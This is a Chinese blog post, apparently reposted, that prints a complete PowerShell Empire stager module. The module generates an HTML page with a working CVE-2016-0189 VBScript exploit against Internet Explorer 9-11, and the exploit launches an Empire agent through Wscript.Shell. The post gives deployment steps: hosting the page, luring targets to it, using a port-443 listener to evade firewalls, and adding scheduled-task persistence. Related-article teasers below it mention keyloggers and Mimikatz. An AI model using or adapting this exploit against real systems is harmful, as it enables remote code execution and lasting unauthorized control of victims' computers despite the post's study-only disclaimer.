利用Powershell Empire和CVE-2016-0189攻击用户的IE浏览器

最新推荐文章于 2024-03-21 09:58:52 发布
最新推荐文章于 2024-03-21 09:58:52 发布
阅读量2.8k 收藏 2
点赞数
分类专栏: 网络安全 文章标签: ie powershell cve 漏洞


前言

Empire(http://www.powershellempire.com/)是一个PowerShell后期漏洞利用代理工具,它建立在密码学、安全通信和灵活的架构之上。Empire实现了无需powershell.exe就可运行PowerShell代理的功能,它可以快速部署后期漏洞利用模块,并且能够躲避网络检测。

因此,Powershell Empire是我们最喜欢的一款工具,尤其是当目标用户在我们的活动范围内时。我们通常使用Metasploit和Empire的组合来完成工作,即结合浏览器漏洞利用和Empire内的标准操作进行。

不过,在最近的一个测试中,我们没有使用MSF,而是使用了Empire中的一个新stager,该stager能够利用漏洞CVE-2016-0189(也称为vbscript_godmod,是一个 IE 游览器的脚本引擎漏洞)来攻击目标用户的IE浏览器(Internet explorer 9-11)。这是近6个月以来我们的首选利用,而且最近我们已经开始开发利用工具。如果成功的话,可以在保证硬盘数据不丢失的情况下启动powershell,同时将代理连接到Empire。

 

利用Powershell Empire和CVE-2016-0189攻击用户的IE浏览器

下面是该新stager的Python代码ms16.py:

from lib.common import helpers
  
class Stager:
  
    def __init__(self, mainMenu, params=[]):
  
        self.info = {
            'Name': 'MS16-051 IE RCE',
  
            'Author': ['www.cgsec.co.uk'],
  
            'Description': ('Leverages MS16-051 to execute powershell in unpatched browsers. This is a file-less vector which works on IE9/10/11 and all versions of Windows'),
  
            'Comments': [
                'Target will have to open link with vulnerable version of IE.'
            ]
        }
  
        # any options needed by the stager, settable during runtime
        self.options = {
            # format:
            #   value_name : {description, required, default_value}
            'Listener' : {
                'Description'   :   'Listener to generate stager for.',
                'Required'      :   True,
                'Value'         :   ''
            },
            'StagerRetries' : {
                'Description'   :   'Times for the stager to retry connecting.',
                'Required'      :   False,
                'Value'         :   '0'
            },
            'OutFile' : {
                'Description'   :   'File to output HTML to, otherwise displayed on the screen.',
                'Required'      :   True,
                'Value'         :   ''
            },
            'Base64' : {
                'Description'   :   'Switch. Base64 encode the powershell output.',
                'Required'      :   True,
                'Value'         :   'True'
            },           
            'UserAgent' : {
                'Description'   :   'User-agent string to use for the staging request (default, none, or other).',
                'Required'      :   False,
                'Value'         :   'default'
            },
            'Proxy' : {
                'Description'   :   'Proxy to use for request (default, none, or other).',
                'Required'      :   False,
                'Value'         :   'default'
            },
            'ProxyCreds' : {
                'Description'   :   'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
                'Required'      :   False,
                'Value'         :   'default'
            }
        }
  
        # save off a copy of the mainMenu object to access external functionality
        #   like listeners/agent handlers/etc.
        self.mainMenu = mainMenu
  
        for param in params:
            # parameter format is [Name, Value]
            option, value = param
            if option in self.options:
                self.options[option]['Value'] = value
  
    def generate(self):
  
        # extract all of our options
        listenerName = self.options['Listener']['Value']
        base64 = self.options['Base64']['Value']
        userAgent = self.options['UserAgent']['Value']
        proxy = self.options['Proxy']['Value']
        proxyCreds = self.options['ProxyCreds']['Value']
        stagerRetries = self.options['StagerRetries']['Value']
  
        encode = False
        if base64.lower() == "true":
            encode = True
  
        # generate the launcher code
        launcher = self.mainMenu.stagers.generate_launcher(listenerName, encode=encode, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds, stagerRetries=stagerRetries)
  
        if launcher == "":
            print helpers.color("[!] Error in launcher command generation.")
            return ""
        else:
                            code =  "<html>\n"
                            code += "<head>\n"
                            code += "<meta http-equiv=\"x-ua-compatible\" content=\"IE=10\">\n"
                            code += "</head>\n"
                            code += "<body>\n"
                            code += "    <script type=\"text/vbscript\">\n"
                            code += "        Dim aw\n"
                            code += "        Dim plunge(32)\n"
                            code += "        Dim y(32)\n"
                            code += "        prefix = \"%u4141%u4141\"\n"
                            code += "        d = prefix & \"%u0016%u4141%u4141%u4141%u4242%u4242\"\n"
                            code += "        b = String(64000, \"D\")\n"
                            code += "        c = d & b\n"
                            code += "        x = UnEscape(c)\n"
                            code += "          \n"
                            code += "        Class ArrayWrapper\n"
                            code += "            Dim A()\n"
                            code += "            Private Sub Class_Initialize\n"
                            code += "                  ReDim Preserve A(1, 2000)\n"
                            code += "            End Sub\n"
                            code += "                    \n"
                            code += "            Public Sub Resize()\n"
                            code += "                ReDim Preserve A(1, 1)\n"
                            code += "            End Sub\n"
                            code += "        End Class\n"
                            code += "          \n"
                            code += "        Class Dummy\n"
                            code += "        End Class\n"
                            code += "          \n"
                            code += "        Function getAddr (arg1, s)\n"
                            code += "            aw = Null\n"
                            code += "            Set aw = New ArrayWrapper\n"
                            code += "          \n"
                            code += "            For i = 0 To 32\n"
                            code += "                Set plunge(i) = s\n"
                            code += "            Next\n"
                            code += "          \n"
                            code += "            Set aw.A(arg1, 2) = s\n"
                            code += "          \n"
                            code += "            Dim addr\n"
                            code += "            Dim i\n"
                            code += "            For i = 0 To 31\n"
                            code += "                If Asc(Mid(y(i), 3, 1)) = VarType(s) Then\n"
                            code += "                   addr = strToInt(Mid(y(i), 3 + 4, 2))\n"
                            code += "                End If\n"
                            code += "                y(i) = Null\n"
                            code += "            Next\n"
                            code += "          \n"
                            code += "            If addr = Null Then\n"
                            code += "                document.location.href = document.location.href\n"
                            code += "                Return\n"
                            code += "            End If\n"
                            code += "            getAddr = addr\n"
                            code += "        End Function\n"
                            code += "          \n"
                            code += "        Function leakMem (arg1, addr)\n"
                            code += "            d = prefix & \"%u0008%u4141%u4141%u4141\"\n"
                            code += "            c = d & intToStr(addr) & b\n"
                            code += "            x = UnEscape(c)\n"
                            code += "          \n"
                            code += "            aw = Null\n"
                            code += "            Set aw = New ArrayWrapper\n"
                            code += "          \n"
                            code += "            Dim o\n"
                            code += "            o = aw.A(arg1, 2)\n"
                            code += "          \n"
                            code += "            leakMem = o\n"
                            code += "        End Function\n"
                            code += "          \n"
                            code += "        Sub overwrite (arg1, addr)\n"
                            code += "            d = prefix & \"%u400C%u0000%u0000%u0000\"\n"
                            code += "            c = d & intToStr(addr) & b\n"
                            code += "            x = UnEscape(c)\n"
                            code += "          \n"
                            code += "            aw = Null\n"
                            code += "            Set aw = New ArrayWrapper\n"
                            code += "          \n"
                            code += "          \n"
                            code += "            aw.A(arg1, 2) = CSng(0)\n"
                            code += "        End Sub\n"
                            code += "          \n"
                            code += "        Function exploit (arg1)\n"
                            code += "            Dim addr\n"
                            code += "            Dim csession\n"
                            code += "            Dim olescript\n"
                            code += "            Dim mem\n"
                            code += "          \n"
                            code += "          \n"
                            code += "            Set dm = New Dummy\n"
                            code += "          \n"
                            code += "            addr = getAddr(arg1, dm)\n"
                            code += "          \n"
                            code += "            mem = leakMem(arg1, addr + 8)\n"
                            code += "            csession = strToInt(Mid(mem, 3, 2))\n"
                            code += "          \n"
                            code += "            mem = leakMem(arg1, csession + 4)\n"
                            code += "            olescript = strToInt(Mid(mem, 1, 2))\n"
                            code += "            overwrite arg1, olescript + &H174\n"
                            code += "     Set Object = CreateObject(\"Wscript.Shell\")\n"
                            code +=    "                 Object.run(\""
                            code +=            launcher +       "\")\n"
                            code += "        End Function\n"
                            code += "          \n"
                            code += "        Function triggerBug\n"
                            code += "            aw.Resize()\n"
                            code += "            Dim i\n"
                            code += "            For i = 0 To 32\n"
                            code += "                ' 24000x2 + 6 = 48006 bytes\n"
                            code += "                y(i) = Mid(x, 1, 24000)\n"
                            code += "            Next\n"
                            code += "        End Function\n"
                            code += "    </script>\n"
                            code += "          \n"
                            code += "    <script type=\"text/javascript\">\n"
                            code += "        function strToInt(s)\n"
                            code += "        {\n"
                            code += "            return s.charCodeAt(0) | (s.charCodeAt(1) << 16);\n"
                            code += "        }\n"
                            code += "        function intToStr(x)\n"
                            code += "        {\n"
                            code += "            return String.fromCharCode(x & 0xffff) + String.fromCharCode(x >> 16);\n"
                            code += "        }\n"
                            code += "        var o;\n"
                            code += "        o = {\"valueOf\": function () {\n"
                            code += "                triggerBug();\n"
                            code += "                return 1;\n"
                            code += "            }};\n"
                            code += "        setTimeout(function() {exploit(o);}, 50);\n"
                            code += "    </script>\n"
                            code += "</body>\n"
                            code += "</html>"
  
         return code


接下来,我们就对这个新的利用做一个简单的介绍:

首先,我们需要获得Empire,可以从Github上下载,下载地址为:

https://github.com/PowerShellEmpire/Empire

 

接下来,我们需要安装Apache2,它可以把索引页直接导向/var/www/html。这一步是可选的,因为大多数人可能想要改变输出,用于其他利用或者逃避检测。


然后,添加我们的新stager,它位于/lib/stagers下,运行Empire的install.sh脚本来启动并运行它。如果你是在Ubuntu上进行操作,那么在运行该脚本之前你需要手动安装pip。

在做好前面的准备工作之后,我们就可以启动Empire了。

如果一切正常的话,我们应该能够使用“stager ms16”。本文只是简单地将输出文件设置到/var/www/html/index.html,然后引导目标到该html页面,如下图所示。

高级一些的用户可能想为不同的用户建立一些更复杂的服务或躲避检测机制,不过这超出了本文的范围,本文只是做出一个简单的介绍。

此外,我还设置了一个对端口443的侦听器,希望绕过某些防火墙和逃避一些检测机制。

最后,当有人使用一个含有漏洞CVE-2016-0189的IE浏览器访问你的服务器时,该利用就会触发,你就会得到一个新的Empire代理。另外,使用持久性模块创建一个计划任务可以确保不会在重启之后失去访问权限。这些可以通过将代理设置为自动运行来实现。

最后声明,本文只是提供了一个利用的简单介绍,仅供安全学习,禁止非法使用!

也提醒用户抓紧时间对IE浏览器进行漏洞修复,微软已经发布了CVE-2016-0189漏洞的修复补丁。

转自:http://www.milw0rm.cn/Article/hacker/20160918/414.html

moonhillcity
关注
专栏目录
PowerShell渗透--Empire
weixin_41082546的博客
10-25 537
0x00 简介 Empire是一款针对Windows平台的,使用PowerShell脚本作为攻击载荷的渗透攻击框架代码具有从stager生成,提权到渗透维持的一系列功能,无需powershell.exe就可以使用powershell的代理功能还可以快速在后期部署漏洞利用模块,内置模块有键盘记录,Mimikatz,绕过UAC,内网扫描等,可以躲避网络检测和大部分安全防护工具,类似于Meterpre...
Empire
m0_65332604的博客
04-06 926
Empire是一款针对Windows平台的、使用Powershell脚本作为攻击载荷的渗透攻击框架工具,具有从stager生成、提权到渗透维持的一系列功能。Empire实现了无需powshell.exe就可运行Powershell代理的功能,还可以快速在后期部署漏洞利用模块,其内置模块有键盘记录、Mimikatz、绕过UAC、内网扫描等,使用能够躲避内网检测和大部分安全防护工具的查杀,简单来说就有点类似Metasploit,是一个基于PowerShell的远程控制木马。 Empire运行在linux平台上
Powershell攻击指南2——Empire
willow_liang的博客
12-05 1279
目录 Empire 1.介绍 2.安装 3.使用监听 4.生成木马 4.1 DLL木马 4.2 launcher 4.3 launcher_vbs木马 4.4 launcher_bat木马 4.5 Macro木马 4.6Ducky 连接主机及基本使用 1.查看已经连接的主机 2.interact命令连接主机 信息收集 Empire 1.介绍 Empire是一款针对Windows平台的,使用PowerShell脚本作为攻击载荷的渗透攻击框架工具,具有从stager生成.
PowerShell简介(WEB安全攻防)
小英雄颂人头
03-02 810
0xx1 PowerShell技术 常用的PowerShell攻击工具 PowerSploit PowerShell后期漏洞利用框架,常用于信息探测,特权提升,凭证窃取,持久化等操作 Nishang 基于PowerShell的渗透测试专用工具,集成了框架,脚本和各种payload,包含下载和执行,键盘记录,DNS,延时命令等脚本 Empire 基于PowerShell的...
CVE-2016-0189
被遗弃的庸才博客
08-04 699
IE CVE-2016-0189远程执行漏洞分析 作者: 被遗弃的庸才 一、前言 IE CVE-2016-0189是通过Microsoft发布的MS16-051的补丁程序进行对比之后发现的,随后漏洞被韩国用于APT攻击。出现漏洞的原因是在vbs解析引擎中,数组中指定下标时会调用vbscript!AccessArray中的vbscript!rtVariantChangeTypeEx函数,vbscript!rtVariantChangeTypeEx函数并没有实现而是调用了oleaut32!VariantChan
Final——PowerShell Empire
weixin_33688840的博客
06-23 475
一、介绍 Empire是一款针对Windows平台的、使用PowerShell脚本作为攻击载荷的渗透攻击框架工具,具有从stager生成、提权到渗透维持的一系列功能。Empire实现了无需powershell.exe就可运行 PowerShell代理的功能,还可以快速在后期部署漏洞利用模块,其内置模块有键盘记录、Mimikatz、绕过UAC、内网扫描等,并且能够躲避网络检测和大部分安全防护工具的...
PowerShell-Empire安装及使用
qq_61074438的博客
05-15 666
Empire简介 Empire是一款针对windows平台的、使用PowerShell脚本作为攻击载荷的渗透攻击框架工具,具有从stager生成、提取到渗透维持的一系列功能。Empire实现了无需powershell.exe就可运行PowerShell代理的功能,还可以快速在后期部署漏洞利用模块,其内置模块有键盘记录,Mimkatz、绕过UAC、内网扫描等,并且能够躲避网络检测和大部分安全防护工具的查杀,简单来说有点类似Metasploit,是一个基于PowerShell的远程控制木马。 全部功能可参考官网
Windows Server CVE-2016-2183 SSL/TLS协议信息泄露漏洞修复脚本
10-06
Windows Server 合规漏洞修复,修复Windows Server CVE-2016-2183 SSL/TLS协议信息泄露漏洞修复脚本,基于Windows PowerShell, 兼容Windows Server 2016/2019,防止Sweet32 生日攻击
Phpmyadmin后台代码执行CVE-2016-5734_poc
09-30
CVE-2016-5734在exploit-db上也就是 phpMyAdmin 4.6.2 - Authenticated Remote Code Execution ,意即phpMyAdmin认证用户的远程代码执行,根据描述可知受影响的phpMyAdmin所有的 4.6.x 版本(直至 4.6.3),4.4.x ...
探索Empire:一款强大的Powershell C2框架
最新发布
gitblog_00029的博客
03-21 396
探索Empire:一款强大的Powershell C2框架 项目地址:https://gitcode.com/BC-SECURITY/Empire 在网络安全领域,有效的渗透测试工具是安全研究人员的得力助手。今天,我们要介绍的Empire是一款开源的、动态语言驱动的Post-exploitation框架,它专为Powershell设计,允许安全专家进行远程操作和控制。让我们一起深入了解一下Empi...
CTF靶机 PowerShell Empire 笔记
z4yn:)的博客
08-28 350
PowerShell Empire 作为Red Primer系列的一部分,了解如何使用这个强大的开发后框架。 Nmap 扫一波端口 发现开放了个445端口,可以尝试用ms17-010 再用Nmap漏洞扫描一下 nmap --script vuln 10.10.241.65 启动MSF msfconsole use windows/smb/ms17_010eternalblue set rhosts 10.10.241.65 set payload windows/x64/meter
Empire – PowerShell 后渗透攻击框架
banacyo14206的博客
09-12 660
0x01 简介 Empire是一个后渗透攻击框架。它是一个纯粹的PowerShell代理,具有加密安全通信和灵活架构的附加功能。Empire具有在不需要PowerShell.exe的情况下执行PowerShell代理的方法。它可以迅速采用可后期利用的模块,涵盖范围广泛,从键盘记录器到mimikatz等。这个框架是PowerShell Empire和Python Empire项目的组合;...
Powershell Empire的使用
她叫常玉莹
07-04 4553
EmpireEmpire简介使用方法设置监听生成木马DLL木马launcherlauncher_vbs木马launcher_bat 木马Macro木马Ducky连接主机信息收集屏幕截图键盘记录剪贴板记录查找共享收集目标主机信息ARP扫描DNS信息获取查找域管登陆服务器IP本地管理组访问模块提权Bypass UACbypassuac_wscriptPowerUpAllChecks模块GPP横向渗透会话注入Invoke-PsExecInvoke-WMIPowerShell Remoting后门权限持久性劫持sh
PowerShell Empire实战入门篇
jennycisp的博客
10-30 336
PowerShsell Empire中文简称 “帝国” ,可能大多数只听说过这款内网渗透神器,针对windows系统平台而打造的一款渗透工具。在PowerShell方面,帝国实现了无需powershell.exe即可运行PowerShell代理的功能,可快速部署的开发后的模块从按键记录到Mimikatz,可逃避网络检测的能力,适应性强的通信,都包裹在易用性为重点的框架,有点类似于像meterpreter。Empire详情介绍参考官方网站:http://powershellempire.com/CSDN大礼包
Powershell Empire工具介绍和使用
菜鸟-宇的个人博客
10-03 298
Empire是一个利用漏洞后的框架,它包括一个纯PowerShell2.0 Windows代理和一个纯Python 2.6/2.7 Linux/OS X代理。它是之前的PowerShell帝国和Python EmPyre项目的合并。该框架提供密码学安全通信和灵活的架构。
powershell-empire4使用介绍
u013930899的博客
05-25 446
目录 一、工具使用 1.基本使用 2.agent代理 2.1. agent代理操作命令 2.2. 连入agent后的命令 3.三大类模块 3.1.situational awareness态势感知,也就是信息收集 3.2. Credentials and privilege escalation 权限提升和凭证获取 3.3.Lateral movement 内网横向移动 4.Empire+matesploit联合使用 前言 本文通过学习整理了empire4的...
CVE-2016-2183修复
01-20
根据提供的引用内容,CVE-2016-2183是一个SSL/TLS协议信息泄露漏洞。下面是修复该漏洞的方法: 1. 使用Windows PowerShell脚本修复漏洞: ```powershell # 下载修复脚本 Invoke-WebRequest -Uri ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值